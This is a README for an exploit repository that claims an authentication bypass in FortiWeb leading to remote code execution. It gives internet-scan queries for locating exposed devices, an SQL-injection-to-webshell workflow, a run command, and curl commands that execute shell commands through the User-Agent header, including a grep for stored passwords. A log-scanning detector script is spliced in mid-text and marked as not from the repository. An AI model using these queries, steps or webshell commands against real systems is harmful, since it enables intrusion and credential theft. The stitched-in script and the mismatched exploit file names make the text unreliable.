# 🚨 FortiWeb Authentication Bypass → Remote Code Execution
## 📌 Overview
This repository demonstrates an **authentication bypass in FortiWeb** that can be chained to achieve **Remote Code Execution (RCE)**.
The exploit leverages a vulnerable endpoint to inject SQL payloads, upload a webshell, and execute commands through HTTP headers.
⚠️ **Disclaimer**:
This project is for **educational and research purposes only**.
Do **NOT** use against systems you don’t own or have explicit permission to test.
### Netlas, FOFA and Shodan
<img width="1841" height="898" alt="Screenshot 2025-08-23 131226" src="https://github.com/user-attachments/assets/e7f0e430-1405-4548-8b9f-53d04bc37dc1" />

**Netlas**
```text
((FortiWeb)) AND port:("8443")
```
**FOFA**
```text
title="FortiWeb" && port="8443"
```
**Shodan**
```text
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
```
## 🔎 Vulnerability Details
- **CVE**: CVE-2025-52970
- **Component**: FortiWeb Fabric API (`/api/fabric/device/status`)
- **Impact**: Authentication Bypass → SQL Injection → Webshell Upload → RCE
- **Vector**: Crafted `Authorization` header + SQL injection
## 🧑💻 Exploit Workflow
1. Drop and create temporary SQL table.
2. Write webshell payload in chunks.
3. Export shell to `/cgi-bin/x.cgi`.
4. Upload helper Python script to trigger permissions.
5. Access webshell by sending commands via `User-Agent` header.
## ⚙️ Usage
### 1️⃣ Clone Repo
```bash
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
```
### 2️⃣ Run Exploit
```bash
python3 exploit.py -t https://TARGET:8443/
```
<img width="1473" height="722" alt="Screenshot 2025-08-23 114753" src="https://github.com/user-attachments/assets/f95c022b-47dc-44ae-8fe5-e7f5694d3e97" />
<img width="1472" height="747" alt="Screenshot 2025-08-23 114915" src="https://github.com/user-attachments/assets/fad31eff-ecf5-41e6-872a-a9c22662db99" />
### 3️⃣ Interact with Webshell
```bash
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
```
<img width="1477" height="722" alt="Screenshot 2025-08-23 114521" src="https://github.com/user-attachments/assets/47cdf826-5891-4192-9f77-b23cd17477bd" />
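As an added detection example (not code from this repository), the following Python script scans constructed web-access-log lines for the traffic pattern described above: SQL metacharacters in the `Authorization` header sent to `/api/fabric/device/status`, requests to `/cgi-bin/x.cgi`, and shell command names in the `User-Agent` header. The log line format, the sample lines and the command-word list are assumptions for illustration, not real FortiWeb log output.

```python
import re
from typing import Dict, List

# Constructed sample log lines (assumed format, not real FortiWeb logs):
# method, path, status, then the Authorization and User-Agent headers in quotes.
SAMPLE_LOG = """\
GET /api/fabric/device/status 200 "Bearer AbCdEf" "Mozilla/5.0"
POST /api/fabric/device/status 500 "Bearer abc' --" "python-requests/2.31"
GET /cgi-bin/x.cgi 200 "-" "id"
GET /cgi-bin/x.cgi 200 "-" "uname -a"
GET /login 200 "-" "Mozilla/5.0"
"""

FABRIC_ENDPOINT = "/api/fabric/device/status"
SHELL_PATH = "/cgi-bin/x.cgi"
# SQL metacharacters and keywords that a legitimate bearer token never carries.
SQLI_HINT = re.compile(r"['\"]|--|/\*|\bOR\b|\bUNION\b|\bSELECT\b", re.IGNORECASE)
# Command words seen in the User-Agent header in the curl examples above
# (list is an assumption; extend it to match your environment).
CMD_UA = re.compile(r"^\s*(id|whoami|uname|grep|cat|ls|sh|bash)\b")
LINE = re.compile(r'^(\S+) (\S+) (\d{3}) "([^"]*)" "([^"]*)"$')

def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into its fields; raise on an unexpected format."""
    m = LINE.match(line)
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    method, path, status, auth, ua = m.groups()
    return {"method": method, "path": path, "status": status, "auth": auth, "ua": ua}

def classify(rec: Dict[str, str]) -> List[str]:
    """Return the detection tags that apply to one parsed request."""
    tags: List[str] = []
    if rec["path"] == FABRIC_ENDPOINT and SQLI_HINT.search(rec["auth"]):
        tags.append("fabric_auth_sqli")      # SQL syntax inside the Authorization header
    if rec["path"] == SHELL_PATH:
        tags.append("webshell_path")         # the CGI path the PoC writes its shell to
    if CMD_UA.search(rec["ua"]):
        tags.append("command_in_user_agent") # command name instead of a browser UA
    return tags

def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one hit record per log line that triggers at least one tag."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        tags = classify(rec)
        if tags:
            hits.append({"path": rec["path"], "ua": rec["ua"], "tags": tags})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```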
## 📂 Repository Layout
```text
[4.0K] /data/pocs/f525c6c000f9d952a874f6bbe88028f24ab14d21
├── [5.1K] Forti_Bang.py
├── [1.0K] LICENSE
└── [2.4K] README.md
0 directories, 3 files
```